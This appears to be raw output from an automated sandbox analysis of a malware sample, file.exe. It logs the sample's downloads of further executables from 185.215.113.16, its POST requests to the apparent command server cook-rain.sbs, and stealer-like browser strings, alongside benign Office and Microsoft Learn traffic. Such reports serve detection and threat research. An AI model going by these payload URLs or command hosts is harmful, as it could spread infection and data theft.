              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/&
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe1
              Source: file.exe, 00000000.00000002.2597460868.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeNn
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2417483737.0000000001250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exeString found in binary or memory: http://go.m
              Source: file.exe, 00000000.00000002.2602050697.0000000005B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.co
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_105.7.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_105.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_105.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_105.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_105.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.2566097864.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=169648449
              Source: file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, file.exe, 00000000.00000003.2566097864.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/$
              Source: file.exe, 00000000.00000003.2317895828.0000000001283000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317925149.0000000001289000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2318012645.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/38e
              Source: file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237464574.0000000001274000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237404207.0000000001272000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiD
              Source: file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284780140.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285514646.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285188462.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiY
              Source: file.exe, 00000000.00000003.2417779345.0000000001267000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417595797.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiz/
              Source: file.exe, 00000000.00000003.2284780140.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285514646.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285188462.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/cg/m5V
              Source: file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/zSUu%
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
